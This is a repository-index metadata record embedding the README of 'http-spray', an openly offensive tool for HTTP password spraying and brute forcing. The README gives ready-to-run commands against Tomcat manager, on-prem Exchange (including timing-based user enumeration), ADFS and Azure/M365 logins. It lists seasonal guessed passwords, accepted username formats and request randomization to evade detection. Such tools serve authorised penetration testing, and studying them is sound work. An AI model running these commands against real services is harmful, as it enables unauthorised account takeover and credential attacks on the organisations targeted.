{"id":20812751,"url":"https://github.com/dadevel/http-spray","last_synced_at":"2026-06-29T07:31:03.191Z","repository":{"id":246184703,"uuid":"820349255","full_name":"dadevel/http-spray","owner":"dadevel","description":"Password Spraying and Brute Forcing over HTTP(S)","archived":false,"fork":false,"pushed_at":"2025-08-12T13:59:26.000Z","size":68,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-08-12T14:33:30.966Z","etag":null,"topics":["brute-force","http","password-spraying"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/dadevel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2024-06-26T09:42:33.000Z","updated_at":"2025-08-12T13:59:24.000Z","dependencies_parsed_at":"2025-01-18T14:54:11.703Z","dependency_job_id":"4c4599ac-2d62-4916-b20d-0093eeab963e","html_url":"https://github.com/dadevel/http-spray","commit_stats":null,"previous_names":["dadevel/http-spray"],"tags_count":6,"template":false,"template_full_name":null,"purl":"pkg:github/dadevel/http-spray","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray/manifests","owner_url":"https://re
pos.ecosyste.ms/api/v1/hosts/GitHub/owners/dadevel","download_url":"https://codeload.github.com/dadevel/http-spray/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34918101,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-29T02:00:05.398Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["brute-force","http","password-spraying"],"created_at":"2024-11-17T20:57:55.660Z","updated_at":"2026-06-29T07:31:03.184Z","avatar_url":"https://github.com/dadevel.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# http-spray\n\n## Setup\n\nInstall with [uv](https://github.com/astral-sh/uv/) or [pipx](https://github.com/pypa/pipx/).\n\n~~~ bash\nuv tool install git+https://github.com/dadevel/http-spray.git\npipx install git+https://github.com/dadevel/http-spray.git\n~~~\n\n## Usage\n\nBasic example: Brute force Tomcat manager login.\n\n~~~ bash\ncurl -LO https://github.com/dadevel/wordlists/raw/main/passwords/tomcat-credentials.txt\nhttp-spray -t https://app.corp.com/tomcat/manager/html -m basic -c ./tomcat-credentials.txt | tee -a ./http-spray.json | jq -c 'select(.status_code != 401)'\n~~~\n\n### Exchange\n\nTime-based user enumeration against on-prem 
Exchange server.\nRequests for valid users take about 0.1s, invalid users take more than 1.5s.\n\n~~~ bash\nhttp-spray -t https://mail.corp.com/rpc/ -m basic -u ./users.txt -p '' | tee -a ./http-spray.json | jq -c 'select(.time \u003c 0.5)'\n~~~\n\n\u003e [!note]\n\u003e The user enumeration requires basic authentication and seems to work only with the user formats `corp\\jdoe` and `corp.com\\jdoe` where `jdoe` is the *samaccountname*.\n\nPassword spraying against on-prem Exchange server.\n\n~~~ bash\nhttp-spray -t https://mail.corp.com/rpc/ -m ntlm ./users.txt -p 'Summer2023#' | tee -a ./http-spray.json | jq -c 'select(.status_code != 401)'\n~~~\n\n\u003e [!note]\n\u003e The endpoint `/autodiscover/autodiscover.xml` returns status 200 for successful logins, but `/rpc/` returns 404 in this case.\n\u003e For additional endpoints see [here](https://github.com/dadevel/wordlists/raw/refs/heads/main/url-exchange.txt).\n\u003e\n\u003e Furthermore, Exchange accepts the following username formats: `jdoe`, `corp\\jdoe`, `corp.com\\jdoe` and `jdoe@corp.com` where `jdoe` is the *samaccountname*.\n\u003e Depending on the environment the *mail* attribute, e.g. `john.doe@corp.com`, might work for the OWA web login.\n\n### ADFS\n\nPassword spraying against ADFS through NTLM authentication.\n\n~~~ bash\nhttp-spray -t https://sts.corp.com/adfs/services/trust/2005/windowstransport -m ntlm -u ./users.txt -p 'Summer2023!' -p 'Winter2023!' | tee -a ./http-spray.json\n~~~\n\nPassword spraying against ADFS through OAuth2 password grant.\n\n~~~ bash\nhttp-spray -t https://sts.corp.com/adfs/oauth2/token -m oauth --client-id 11111111-2222-3333-4444-555555555555 --resource https://app.corp.com/ -u ./users.txt -p 'Summer2023!' -p 'Winter2023!' 
| tee -a ./http-spray.json | jq -c 'select(.status_code == 200)'\n~~~\n\n\u003e [!note]\n\u003e ADFS accepts the following username formats: `corp\\jdoe`, `corp.com\\jdoe` and `jdoe@corp.com` where `jdoe` is the *samaccountname*.\n\u003e Depending on the environment the *mail* attribute, e.g. `john.doe@corp.com`, might work as well.\n\n### Microsoft Cloud\n\nPassword spraying against Azure/M365 through OAuth2 password grant.\n\n~~~ bash\nhttp-spray -t https://login.windows.net/corp.com/oauth2/token -m msauth --client-id 1fec8e78-bce4-4aaf-ab1b-5451cc387264 --resource https://graph.windows.net -u ./users.txt -p 'Summer@2024' | tee -a ./http-spray.json\n~~~\n\nPassword spraying against Azure/M365 with full request randomization.\n\n~~~ bash\nhttp-spray -t https://login.microsoftonline.com/corp.com/oauth2/token -m msauth --user-agents ./wordlists/desktop-user-agents.csv --client-id ./wordlists/m365-public-clients.csv --resource ./wordlists/m365-resources.csv -u ./users.txt -p ./passwords.txt | tee -a ./http-spray.json\n~~~\n\n\u003e [!note]\n\u003e The username must be specified as an email address, e.g. `john.doe@corp.com`.\n\n### Push Notifications\n\nIntegration for [pushover.net](https://pushover.net/).\n\n~~~ bash\ntail -f ./http-spray.json | jq -c 'select(.status!=\"invalid\" and .status!=\"exists\")|del(.user, .password)' | while read -r line; do\n    curl -sSf https://api.pushover.net/1/messages.json -d user=$PUSHOVER_USER -d token=$PUSHOVER_TOKEN --data-urlencode title='Password Spraying' --data-urlencode message=\"$line\"\ndone\n~~~\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdadevel%2Fhttp-spray","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdadevel%2Fhttp-spray","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdadevel%2Fhttp-spray/lists"}